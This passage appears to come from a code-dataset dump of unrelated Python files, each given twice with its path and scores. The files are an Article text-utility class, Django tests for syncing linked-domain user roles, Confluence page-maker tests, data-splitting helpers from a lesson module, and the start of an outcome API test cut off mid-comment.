def __init__(self, title: str, author: str, publication_date: datetime.datetime, content: str):
self.title = title
self.author = author
self.content = content
self.publication_date = publication_date
def __repr__(self):
return "<Article title=\"{}\" author='{}' publication_date='{}'>".format(self.title, self.author, self.publication_date.isoformat())
def __len__(self):
return len(self.content)
def short_introduction(self, n_characters):
new_content = self.content.replace('\n', ' ')
return new_content[:n_characters+1].rsplit(' ', 1)[0]
def most_common_words(self, n_words):
pure_content = self.content.translate({ord(character): " " for character in "!@#'$%^&*()[]{};:,./<>?\|`~-=_+"})
new_content = pure_content.lower().split()
uniques = []
for unique in new_content:
if unique not in uniques:
uniques.append(unique)
counts = []
for unique in uniques:
count = 0
for word in new_content:
if word == unique:
count += 1
counts.append(unique)
counts.append(count)
result = {counts[i]: counts[i + 1] for i in range(0, len(counts), 2)}
sorted_result = {key: value for key, value in sorted(result.items(), key=lambda item: item[1], reverse=True)[:n_words]}
return sorted_result
fairytale = Article(title="The emperor's new clothes",
author="<NAME>",
content="'But he has nothing at all on!' at last cried out all the people. The Emperor was vexed, for he knew that the people were right.",
publication_date=datetime.datetime(1837, 4, 7, 12, 15, 0))
print(fairytale.publication_date)
print(fairytale)
print(len(fairytale))
print(fairytale.short_introduction(n_characters=16))
print(fairytale.most_common_words(5)) | qualifier.py | import datetime
import typing
class ArticleField:
"""The `ArticleField` class for the Advanced Requirements."""
def __init__(self, field_type: typing.Type[typing.Any]):
pass
class Article:
"""The `Article` class you need to write for the qualifier."""
def __init__(self, title: str, author: str, publication_date: datetime.datetime, content: str):
self.title = title
self.author = author
self.content = content
self.publication_date = publication_date
def __repr__(self):
return "<Article title=\"{}\" author='{}' publication_date='{}'>".format(self.title, self.author, self.publication_date.isoformat())
def __len__(self):
return len(self.content)
def short_introduction(self, n_characters):
new_content = self.content.replace('\n', ' ')
return new_content[:n_characters+1].rsplit(' ', 1)[0]
def most_common_words(self, n_words):
pure_content = self.content.translate({ord(character): " " for character in "!@#'$%^&*()[]{};:,./<>?\|`~-=_+"})
new_content = pure_content.lower().split()
uniques = []
for unique in new_content:
if unique not in uniques:
uniques.append(unique)
counts = []
for unique in uniques:
count = 0
for word in new_content:
if word == unique:
count += 1
counts.append(unique)
counts.append(count)
result = {counts[i]: counts[i + 1] for i in range(0, len(counts), 2)}
sorted_result = {key: value for key, value in sorted(result.items(), key=lambda item: item[1], reverse=True)[:n_words]}
return sorted_result
fairytale = Article(title="The emperor's new clothes",
author="<NAME>",
content="'But he has nothing at all on!' at last cried out all the people. The Emperor was vexed, for he knew that the people were right.",
publication_date=datetime.datetime(1837, 4, 7, 12, 15, 0))
print(fairytale.publication_date)
print(fairytale)
print(len(fairytale))
print(fairytale.short_introduction(n_characters=16))
print(fairytale.most_common_words(5)) | 0.777638 | 0.259518 |
import uuid
from django.test import TestCase
from unittest.mock import patch
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.linked_domain.models import DomainLink
from corehq.apps.linked_domain.tests.test_linked_apps import BaseLinkedDomainTest
from corehq.apps.linked_domain.updates import update_user_roles
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.userreports.util import get_ucr_class_name
from corehq.apps.users.models import Permissions, UserRole
class TestUpdateRoles(BaseLinkedDomainTest):
@classmethod
def setUpClass(cls):
super(TestUpdateRoles, cls).setUpClass()
permissions = Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
)
cls.role = UserRole.create(cls.domain, 'test', permissions, is_non_admin_editable=True)
cls.other_role = UserRole.create(
cls.domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
cls.other_role.set_assignable_by([cls.role.id])
@classmethod
def tearDownClass(cls):
cls.role.delete()
cls.other_role.delete()
super(TestUpdateRoles, cls).tearDownClass()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRoles, self).tearDown()
def test_update_report_list(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
report_mapping = {'master_report_id': 'linked_report_id'}
with patch('corehq.apps.linked_domain.updates.get_static_report_mapping', return_value=report_mapping):
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertEqual(roles['test'].permissions.view_report_list, [get_ucr_class_name('linked_report_id')])
self.assertTrue(roles['test'].is_non_admin_editable)
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].assignable_by, [roles['test'].get_id])
def test_match_names(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with the same name but no 'upstream_id'
UserRole.create(
self.linked_domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
def test_match_ids(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with upstream_id and name not matching upstream name
UserRole.create(
self.linked_domain, 'id_test', Permissions(edit_web_users=False, view_locations=True),
upstream_id=self.other_role.get_id
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles), roles.keys())
self.assertIsNotNone(roles.get('other_test'))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
class TestUpdateRolesRemote(TestCase):
role_json_template = {
"name": None,
"permissions": None,
"default_landing_page": None,
"is_non_admin_editable": False,
"assignable_by": [],
"is_archived": False,
"upstream_id": None
}
@classmethod
def setUpClass(cls):
super(TestUpdateRolesRemote, cls).setUpClass()
cls.domain_obj = create_domain('domain')
cls.domain = cls.domain_obj.name
cls.linked_domain_obj = create_domain('domain-2')
cls.linked_domain = cls.linked_domain_obj.name
cls.domain_link = DomainLink.link_domains(cls.linked_domain, cls.domain)
cls.domain_link.remote_base_url = "http://other.org"
cls.domain_link.save()
@classmethod
def tearDownClass(cls):
cls.domain_link.delete()
cls.domain_obj.delete()
cls.linked_domain_obj.delete()
super(TestUpdateRolesRemote, cls).tearDownClass()
def setUp(self):
self.upstream_role1_id = uuid.uuid4().hex
self.role1 = UserRole.create(
domain=self.linked_domain,
name='test',
permissions=Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
),
is_non_admin_editable=True,
upstream_id=self.upstream_role1_id
)
self.other_role = UserRole.create(
domain=self.linked_domain,
name='other_test',
permissions=Permissions(
edit_web_users=True,
view_locations=True,
),
assignable_by=[self.role1.id],
)
self.other_role.save()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRolesRemote, self).tearDown()
@patch('corehq.apps.linked_domain.updates.remote_get_user_roles')
def test_update_remote(self, remote_get_user_roles):
remote_permissions = Permissions(
edit_data=False,
edit_reports=True,
view_report_list=['corehq.reports.static_report']
)
# sync with existing local role
remote_role1 = self._make_remote_role_json(
_id=self.upstream_role1_id,
name="test",
permissions=remote_permissions.to_json(),
)
# create new role
remote_role_other = self._make_remote_role_json(
_id=uuid.uuid4().hex,
name="another",
permissions=Permissions().to_json(),
assignable_by=[self.upstream_role1_id]
)
remote_get_user_roles.return_value = [
_clean_json(role) for role in [remote_role1, remote_role_other]
]
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(3, len(roles))
self.assertEqual(roles['test'].permissions, remote_permissions)
self.assertEqual(roles['test'].is_non_admin_editable, False)
self.assertEqual(roles['another'].assignable_by, [self.role1.get_id])
self.assertEqual(roles['another'].permissions, Permissions())
self.assertEqual(roles['other_test'].assignable_by, [self.role1.get_id])
def _make_remote_role_json(self, **kwargs):
role_json = self.role_json_template.copy()
role_json.update(**kwargs)
return role_json | corehq/apps/linked_domain/tests/test_update_roles.py | import uuid
from django.test import TestCase
from unittest.mock import patch
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.linked_domain.models import DomainLink
from corehq.apps.linked_domain.tests.test_linked_apps import BaseLinkedDomainTest
from corehq.apps.linked_domain.updates import update_user_roles
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.userreports.util import get_ucr_class_name
from corehq.apps.users.models import Permissions, UserRole
class TestUpdateRoles(BaseLinkedDomainTest):
@classmethod
def setUpClass(cls):
super(TestUpdateRoles, cls).setUpClass()
permissions = Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
)
cls.role = UserRole.create(cls.domain, 'test', permissions, is_non_admin_editable=True)
cls.other_role = UserRole.create(
cls.domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
cls.other_role.set_assignable_by([cls.role.id])
@classmethod
def tearDownClass(cls):
cls.role.delete()
cls.other_role.delete()
super(TestUpdateRoles, cls).tearDownClass()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRoles, self).tearDown()
def test_update_report_list(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
report_mapping = {'master_report_id': 'linked_report_id'}
with patch('corehq.apps.linked_domain.updates.get_static_report_mapping', return_value=report_mapping):
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertEqual(roles['test'].permissions.view_report_list, [get_ucr_class_name('linked_report_id')])
self.assertTrue(roles['test'].is_non_admin_editable)
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].assignable_by, [roles['test'].get_id])
def test_match_names(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with the same name but no 'upstream_id'
UserRole.create(
self.linked_domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
def test_match_ids(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with upstream_id and name not matching upstream name
UserRole.create(
self.linked_domain, 'id_test', Permissions(edit_web_users=False, view_locations=True),
upstream_id=self.other_role.get_id
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles), roles.keys())
self.assertIsNotNone(roles.get('other_test'))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
class TestUpdateRolesRemote(TestCase):
    """Verifies that update_user_roles() syncs roles fetched from a remote upstream."""

    # Shape of the role payload served by the remote API.
    role_json_template = {
        "name": None,
        "permissions": None,
        "default_landing_page": None,
        "is_non_admin_editable": False,
        "assignable_by": [],
        "is_archived": False,
        "upstream_id": None
    }

    @classmethod
    def setUpClass(cls):
        super(TestUpdateRolesRemote, cls).setUpClass()
        cls.domain_obj = create_domain('domain')
        cls.linked_domain_obj = create_domain('domain-2')
        cls.domain = cls.domain_obj.name
        cls.linked_domain = cls.linked_domain_obj.name
        cls.domain_link = DomainLink.link_domains(cls.linked_domain, cls.domain)
        # Setting a remote base URL makes the link exercise the remote-sync path.
        cls.domain_link.remote_base_url = "http://other.org"
        cls.domain_link.save()

    @classmethod
    def tearDownClass(cls):
        cls.domain_link.delete()
        cls.domain_obj.delete()
        cls.linked_domain_obj.delete()
        super(TestUpdateRolesRemote, cls).tearDownClass()

    def setUp(self):
        self.upstream_role1_id = uuid.uuid4().hex
        # Downstream role already linked to an upstream id.
        self.role1 = UserRole.create(
            domain=self.linked_domain,
            name='test',
            permissions=Permissions(
                edit_data=True,
                edit_reports=True,
                view_report_list=[
                    'corehq.reports.DynamicReportmaster_report_id'
                ]
            ),
            is_non_admin_editable=True,
            upstream_id=self.upstream_role1_id
        )
        # Purely local role with no upstream counterpart.
        self.other_role = UserRole.create(
            domain=self.linked_domain,
            name='other_test',
            permissions=Permissions(
                edit_web_users=True,
                view_locations=True,
            ),
            assignable_by=[self.role1.id],
        )
        self.other_role.save()

    def tearDown(self):
        for role in UserRole.objects.get_by_domain(self.linked_domain):
            role.delete()
        super(TestUpdateRolesRemote, self).tearDown()

    @patch('corehq.apps.linked_domain.updates.remote_get_user_roles')
    def test_update_remote(self, remote_get_user_roles):
        remote_permissions = Permissions(
            edit_data=False,
            edit_reports=True,
            view_report_list=['corehq.reports.static_report']
        )
        # Payload that updates the existing linked role.
        remote_role1 = self._make_remote_role_json(
            _id=self.upstream_role1_id,
            name="test",
            permissions=remote_permissions.to_json(),
        )
        # Payload for a brand-new role that should be created downstream.
        remote_role_other = self._make_remote_role_json(
            _id=uuid.uuid4().hex,
            name="another",
            permissions=Permissions().to_json(),
            assignable_by=[self.upstream_role1_id]
        )
        remote_get_user_roles.return_value = [
            _clean_json(role) for role in [remote_role1, remote_role_other]
        ]

        update_user_roles(self.domain_link)

        roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
        self.assertEqual(3, len(roles))
        self.assertEqual(roles['test'].permissions, remote_permissions)
        self.assertEqual(roles['test'].is_non_admin_editable, False)
        self.assertEqual(roles['another'].assignable_by, [self.role1.get_id])
        self.assertEqual(roles['another'].permissions, Permissions())
        self.assertEqual(roles['other_test'].assignable_by, [self.role1.get_id])

    def _make_remote_role_json(self, **kwargs):
        """Build a remote-style role payload from the class template."""
        return dict(self.role_json_template, **kwargs)
from unittest import TestCase
import os
from conf_publisher.page_maker import make_page, make_pages
from conf_publisher.confluence import Page
from conf_publisher.config import ConfigLoader, ConfigDumper
class FakeConfluencePageManager(object):
    """In-memory stand-in for the Confluence page manager, for tests.

    Pages are stored in a dict keyed by content id; new ids are allocated
    sequentially above the highest id currently in use.
    """

    def __init__(self, initial_pages=None):
        if initial_pages is None:
            initial_pages = []
        self._pages = {page.id: page for page in initial_pages}

    def _get_last_content_id(self):
        # Highest id currently in use, or 0 when no pages exist yet.
        if self._pages:
            return max(self._pages)
        return 0

    def load(self, content_id):
        """Return the page stored under *content_id* (KeyError if absent)."""
        return self._pages[content_id]

    def create(self, page):
        """Store *page* under a freshly allocated id and return that id."""
        content_id = self._get_last_content_id() + 1
        self._pages[content_id] = page
        return content_id

    def update(self, page, bump_version=True):
        """Replace the stored page with *page*; optionally bump its version."""
        if bump_version:
            page.version_number += 1
        self._pages[page.id] = page
        return page.id
def make_page_fixture(page_id=None, title=None, body=None, space_key='TEST'):
    """Build a Page populated with the given attributes (space defaults to 'TEST')."""
    page = Page()
    page.id = page_id
    page.space_key = space_key
    page.title = title
    page.body = body
    return page
class PageMakerTestCase(TestCase):
    """Exercises make_page / make_pages and YAML config round-tripping."""

    def test_make_page(self):
        parent_page = make_page_fixture(page_id=40000000, title='parent page')
        manager = FakeConfluencePageManager([parent_page])
        # A child created under the parent gets the next sequential id.
        child_id = make_page(parent_page, 'child page', manager)
        self.assertEqual(child_id, 40000001)

    def test_make_pages_with_parent_id(self):
        manager = FakeConfluencePageManager([
            make_page_fixture(page_id=40000000, title='parent page')
        ])
        # Flat config: the parent comes from the explicit parent_id argument.
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'title': 'child page',
                }
            ]
        })
        make_pages(config, manager, parent_id=40000000)
        self.assertIn(40000001, manager._pages)

    def test_make_pages_without_parent_id(self):
        manager = FakeConfluencePageManager([
            make_page_fixture(page_id=40000000, title='parent page')
        ])
        # Nested config: the parent is described inside the config itself.
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'id': 40000000,
                    'title': 'parent page',
                    'pages': [
                        {
                            'title': 'child page',
                        }
                    ]
                }
            ]
        })
        make_pages(config, manager, parent_id=40000000)
        self.assertIn(40000001, manager._pages)

    def test_dump_config(self):
        expected = [
            'version: 2\n',
            'base_dir: fixtures\n',
            'pages:\n',
            '- id: 40000000\n',
            '  title: parent page\n',
            '  pages:\n',
            '  - title: child page\n'
        ]
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'id': 40000000,
                    'title': 'parent page',
                    'pages': [
                        {
                            'title': 'child page',
                        }
                    ]
                }
            ]
        })
        ConfigDumper.to_yaml_file(config, 'test_cfg.yaml')
        with open('test_cfg.yaml') as cfg:
            lines = cfg.readlines()
        os.remove('test_cfg.yaml')
        self.assertEqual(expected, lines)
import os
from conf_publisher.page_maker import make_page, make_pages
from conf_publisher.confluence import Page
from conf_publisher.config import ConfigLoader, ConfigDumper
class FakeConfluencePageManager(object):
    """In-memory stand-in for the Confluence page manager, for tests.

    Pages are stored in a dict keyed by content id; new ids are allocated
    sequentially above the highest id currently in use.
    """

    def __init__(self, initial_pages=None):
        if initial_pages is None:
            initial_pages = []
        self._pages = {page.id: page for page in initial_pages}

    def _get_last_content_id(self):
        # Highest id currently in use, or 0 when no pages exist yet.
        if self._pages:
            return max(self._pages)
        return 0

    def load(self, content_id):
        """Return the page stored under *content_id* (KeyError if absent)."""
        return self._pages[content_id]

    def create(self, page):
        """Store *page* under a freshly allocated id and return that id."""
        content_id = self._get_last_content_id() + 1
        self._pages[content_id] = page
        return content_id

    def update(self, page, bump_version=True):
        """Replace the stored page with *page*; optionally bump its version."""
        if bump_version:
            page.version_number += 1
        self._pages[page.id] = page
        return page.id
def make_page_fixture(page_id=None, title=None, body=None, space_key='TEST'):
    """Build a Page populated with the given attributes (space defaults to 'TEST')."""
    page = Page()
    page.id = page_id
    page.space_key = space_key
    page.title = title
    page.body = body
    return page
class PageMakerTestCase(TestCase):
    """Exercises make_page / make_pages and YAML config round-tripping."""

    def test_make_page(self):
        parent_page = make_page_fixture(page_id=40000000, title='parent page')
        manager = FakeConfluencePageManager([parent_page])
        # A child created under the parent gets the next sequential id.
        child_id = make_page(parent_page, 'child page', manager)
        self.assertEqual(child_id, 40000001)

    def test_make_pages_with_parent_id(self):
        manager = FakeConfluencePageManager([
            make_page_fixture(page_id=40000000, title='parent page')
        ])
        # Flat config: the parent comes from the explicit parent_id argument.
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'title': 'child page',
                }
            ]
        })
        make_pages(config, manager, parent_id=40000000)
        self.assertIn(40000001, manager._pages)

    def test_make_pages_without_parent_id(self):
        manager = FakeConfluencePageManager([
            make_page_fixture(page_id=40000000, title='parent page')
        ])
        # Nested config: the parent is described inside the config itself.
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'id': 40000000,
                    'title': 'parent page',
                    'pages': [
                        {
                            'title': 'child page',
                        }
                    ]
                }
            ]
        })
        make_pages(config, manager, parent_id=40000000)
        self.assertIn(40000001, manager._pages)

    def test_dump_config(self):
        expected = [
            'version: 2\n',
            'base_dir: fixtures\n',
            'pages:\n',
            '- id: 40000000\n',
            '  title: parent page\n',
            '  pages:\n',
            '  - title: child page\n'
        ]
        config = ConfigLoader.from_dict({
            'version': 2,
            'base_dir': 'fixtures',
            'pages': [
                {
                    'id': 40000000,
                    'title': 'parent page',
                    'pages': [
                        {
                            'title': 'child page',
                        }
                    ]
                }
            ]
        })
        ConfigDumper.to_yaml_file(config, 'test_cfg.yaml')
        with open('test_cfg.yaml') as cfg:
            lines = cfg.readlines()
        os.remove('test_cfg.yaml')
        self.assertEqual(expected, lines)
__all__ = ['A', 'B', 'Transform', 'compose', 'ItemList', 'ResizeTransform', 'ImageItemList', 'group_by', 'Matcher',
'map_group', 'SplitData']
# Cell
from solutions.lesson1 import *
from solutions.lesson2 import *
from solutions.lesson3 import *
from typing import List, Sequence, TypeVar, Generic, Callable, Tuple, Union, Optional, Set
from types import GeneratorType
from PIL import Image
import requests
import tempfile
from io import BytesIO
from pathlib import Path
import mimetypes
from collections import OrderedDict
# Cell
A = TypeVar('A')
B = TypeVar('B')
# Cell
class Transform(Generic[A, B]):
    """Callable mapping an ``A`` to a ``B``; subclasses implement ``__call__``."""

    # Transforms are applied in ascending ``_order`` (see ``compose``).
    _order = 0

    def __call__(self, x: A) -> B:
        raise NotImplementedError
# Cell
def compose(x: A, fs: Sequence[Callable[[A], A]]) -> A:
    """Apply each callable in *fs* to *x* in ascending ``_order`` and return the result."""
    for fn in sorted(fs, key=lambda f: getattr(f, '_order', 0)):
        x = fn(x)
    return x
# Cell
class ItemList(ListContainer, Generic[A]):
    """List-like container whose items can be fetched with transforms applied."""

    def __init__(self, items: List[A]):
        self.items = items

    def get(self, idx: int) -> A:
        """Return the raw item at *idx* (subclasses may override to load/convert)."""
        return self.items[idx]

    def _get(self, idx, tfms: Union[Callable[[A], A], Sequence[Callable[[A], A]]]) -> A:
        # Normalise tfms to a list: generators/sets are materialised and a
        # single callable is wrapped, so compose() always sees a sequence.
        if isinstance(tfms, (GeneratorType, set)):
            tfms = list(tfms)
        elif callable(tfms):
            tfms = [tfms]
        item = self.get(idx)
        return compose(item, tfms)

    def __repr__(self):
        return "{}:\n{} items\n{}".format(
            self.__class__.__name__, self.__len__(), super().__repr__())
# Cell
class ResizeTransform(Transform[Image.Image, Image.Image]):
    """Transform that resizes a PIL image to a fixed pixel size."""

    def __init__(self, px: Tuple[int, int]):
        # Target size, passed straight through to Image.resize.
        self.px = px

    def __call__(self, img: Image):
        return img.resize(self.px)
# Cell
class ImageItemList(ItemList):
    """ItemList whose items are file paths opened as PIL images on access."""

    def get(self, idx: int) -> Image:
        return Image.open(self.items[idx])

    @classmethod
    def from_files(cls, path: Union[Path, str], extensions=None, recurse=True):
        """Build an ImageItemList from the image files found under *path*."""
        path = Path(path)
        return ImageItemList(get_files(path, extensions=extensions, recurse=recurse))
# Cell
def group_by(l: List[A], *preds: Predicate[A]):
    """Partition *l* by successive predicates.

    Produces one list per predicate; elements claimed by an earlier predicate
    are not offered to later ones. With no predicates the result is ``[]``.
    """
    if len(preds) == 0:
        return []
    first, rest = preds[0], preds[1:]
    matched, unmatched = [], []
    for elem in l:
        (matched if first(elem) else unmatched).append(elem)
    return [matched, *group_by(unmatched, *rest)]
# Cell
class Matcher(Generic[A]):
    """Equality tester bound to a fixed value.

    Holds ``value`` and an optional transform ``f``; calling the matcher
    applies ``f`` to the candidate and compares the result against ``value``.
    """

    def __init__(self, value: A, f: Optional[Callable[[A], A]] = None):
        self.value = value
        self.f = f or identity

    def __call__(self, other: A) -> bool:
        return self.value == self.f(other)
def map_group(l: List[A], vals: List[B], f: Callable[[A], B] = None) -> List[List[A]]:
    """Group *l* into one bucket per value in *vals*, matching on ``f(elem) == val``."""
    key_fn = identity if f is None else f
    return group_by(l, *(Matcher(v, key_fn) for v in vals))
# Cell
class SplitData(Generic[A]):
    """Train/valid(/test) split of an ItemList."""

    def __init__(self, train: ItemList[A], valid: ItemList[A], test: Optional[ItemList[A]] = None):
        self.train = train
        self.valid = valid
        # An absent/empty test split is normalised to an empty ItemList.
        self.test = test or ItemList([])

    def __repr__(self):
        main = "SplitData\nTrain:\n{}\n\nValid:\n{}".format(self.train, self.valid)
        if len(self.test) > 0:
            return main + "\n\nTest:\n{}".format(self.test)
        return main

    @classmethod
    def split_by_fn(cls, il: ItemList[A], f: Callable[[A], str], train_val='train', valid_val='valid', test_val='test'):
        """Split *il* into train/valid/test according to the label ``f(item)``."""
        il_cls = il.__class__
        # Bind each expected label as a default argument to avoid late binding.
        preds = [lambda x, v=v: f(x) == v for v in (train_val, valid_val, test_val)]
        train, valid, test = group_by(il, *preds)
        return cls(il_cls(train), il_cls(valid), il_cls(test))
__all__ = ['A', 'B', 'Transform', 'compose', 'ItemList', 'ResizeTransform', 'ImageItemList', 'group_by', 'Matcher',
'map_group', 'SplitData']
# Cell
from solutions.lesson1 import *
from solutions.lesson2 import *
from solutions.lesson3 import *
from typing import List, Sequence, TypeVar, Generic, Callable, Tuple, Union, Optional, Set
from types import GeneratorType
from PIL import Image
import requests
import tempfile
from io import BytesIO
from pathlib import Path
import mimetypes
from collections import OrderedDict
# Cell
A = TypeVar('A')
B = TypeVar('B')
# Cell
class Transform(Generic[A, B]):
    """Callable mapping an ``A`` to a ``B``; subclasses implement ``__call__``."""

    # Transforms are applied in ascending ``_order`` (see ``compose``).
    _order = 0

    def __call__(self, x: A) -> B:
        raise NotImplementedError
# Cell
def compose(x: A, fs: Sequence[Callable[[A], A]]) -> A:
    """Apply each callable in *fs* to *x* in ascending ``_order`` and return the result."""
    for fn in sorted(fs, key=lambda f: getattr(f, '_order', 0)):
        x = fn(x)
    return x
# Cell
class ItemList(ListContainer, Generic[A]):
    """List-like container whose items can be fetched with transforms applied."""

    def __init__(self, items: List[A]):
        self.items = items

    def get(self, idx: int) -> A:
        """Return the raw item at *idx* (subclasses may override to load/convert)."""
        return self.items[idx]

    def _get(self, idx, tfms: Union[Callable[[A], A], Sequence[Callable[[A], A]]]) -> A:
        # Normalise tfms to a list: generators/sets are materialised and a
        # single callable is wrapped, so compose() always sees a sequence.
        if isinstance(tfms, (GeneratorType, set)):
            tfms = list(tfms)
        elif callable(tfms):
            tfms = [tfms]
        item = self.get(idx)
        return compose(item, tfms)

    def __repr__(self):
        return "{}:\n{} items\n{}".format(
            self.__class__.__name__, self.__len__(), super().__repr__())
# Cell
class ResizeTransform(Transform[Image.Image, Image.Image]):
    """Transform that resizes a PIL image to a fixed pixel size."""

    def __init__(self, px: Tuple[int, int]):
        # Target size, passed straight through to Image.resize.
        self.px = px

    def __call__(self, img: Image):
        return img.resize(self.px)
# Cell
class ImageItemList(ItemList):
    """ItemList whose items are file paths opened as PIL images on access."""

    def get(self, idx: int) -> Image:
        return Image.open(self.items[idx])

    @classmethod
    def from_files(cls, path: Union[Path, str], extensions=None, recurse=True):
        """Build an ImageItemList from the image files found under *path*."""
        path = Path(path)
        return ImageItemList(get_files(path, extensions=extensions, recurse=recurse))
# Cell
def group_by(l: List[A], *preds: Predicate[A]):
    """Partition *l* by successive predicates.

    Produces one list per predicate; elements claimed by an earlier predicate
    are not offered to later ones. With no predicates the result is ``[]``.
    """
    if len(preds) == 0:
        return []
    first, rest = preds[0], preds[1:]
    matched, unmatched = [], []
    for elem in l:
        (matched if first(elem) else unmatched).append(elem)
    return [matched, *group_by(unmatched, *rest)]
# Cell
class Matcher(Generic[A]):
    """Equality tester bound to a fixed value.

    Holds ``value`` and an optional transform ``f``; calling the matcher
    applies ``f`` to the candidate and compares the result against ``value``.
    """

    def __init__(self, value: A, f: Optional[Callable[[A], A]] = None):
        self.value = value
        self.f = f or identity

    def __call__(self, other: A) -> bool:
        return self.value == self.f(other)
def map_group(l: List[A], vals: List[B], f: Callable[[A], B] = None) -> List[List[A]]:
    """Group *l* into one bucket per value in *vals*, matching on ``f(elem) == val``."""
    key_fn = identity if f is None else f
    return group_by(l, *(Matcher(v, key_fn) for v in vals))
# Cell
class SplitData(Generic[A]):
    """Train/valid(/test) split of an ItemList."""

    def __init__(self, train: ItemList[A], valid: ItemList[A], test: Optional[ItemList[A]] = None):
        self.train = train
        self.valid = valid
        # An absent/empty test split is normalised to an empty ItemList.
        self.test = test or ItemList([])

    def __repr__(self):
        main = "SplitData\nTrain:\n{}\n\nValid:\n{}".format(self.train, self.valid)
        if len(self.test) > 0:
            return main + "\n\nTest:\n{}".format(self.test)
        return main

    @classmethod
    def split_by_fn(cls, il: ItemList[A], f: Callable[[A], str], train_val='train', valid_val='valid', test_val='test'):
        """Split *il* into train/valid/test according to the label ``f(item)``."""
        il_cls = il.__class__
        # Bind each expected label as a default argument to avoid late binding.
        preds = [lambda x, v=v: f(x) == v for v in (train_val, valid_val, test_val)]
        train, valid, test = group_by(il, *preds)
        return cls(il_cls(train), il_cls(valid), il_cls(test))
import json
from datetime import datetime, timedelta
from app import db, LOGGER
from app.utils.testing import ApiTestCase
from app.outcome.models import Outcome, Status
from app.outcome.repository import OutcomeRepository as outcome_repository
class OutcomeApiTest(ApiTestCase):
    """Tests for the outcome repository and the /outcome API endpoints."""

    def seed_static_data(self):
        """Create two events, two applicants, two event admins and four outcomes."""
        db.session.expire_on_commit = False

        self.event1 = self.add_event(name={'en': 'Event 1'}, key='event1')
        self.event2 = self.add_event(name={'en': 'Event 2'}, key='event2')

        self.test_user1 = self.add_user('<EMAIL>')
        self.test_user2 = self.add_user('<EMAIL>')
        self.event1_admin = self.add_user('<EMAIL>')
        self.event2_admin = self.add_user('<EMAIL>')
        self.event1.add_event_role('admin', self.event1_admin.id)
        self.event2.add_event_role('admin', self.event2_admin.id)

        # Event 1 / user 1: superseded WAITLIST followed by the latest ACCEPTED.
        self.event1_user1_outcome1 = Outcome(self.event1.id, self.test_user1.id, 'WAITLIST', self.event1_admin.id)
        self.event1_user1_outcome1.reset_latest()
        self.event1_user1_outcome2 = Outcome(self.event1.id, self.test_user1.id, 'ACCEPTED', self.event1_admin.id)
        # Event 1 / user 2: single REJECTED outcome.
        self.event1_user2_outcome = Outcome(self.event1.id, self.test_user2.id, 'REJECTED', self.event1_admin.id)
        # Event 2 / user 1: single WAITLIST outcome.
        self.event2_user1_outcome = Outcome(self.event2.id, self.test_user1.id, 'WAITLIST', self.event2_admin.id)
        db.session.add_all([
            self.event1_user1_outcome1,
            self.event1_user1_outcome2,
            self.event1_user2_outcome,
            self.event2_user1_outcome
        ])
        db.session.commit()

        self.add_email_template('outcome-rejected')
        self.add_email_template('outcome-waitlist')
        db.session.flush()

        # Capture ids/values up front so later assertions don't rely on
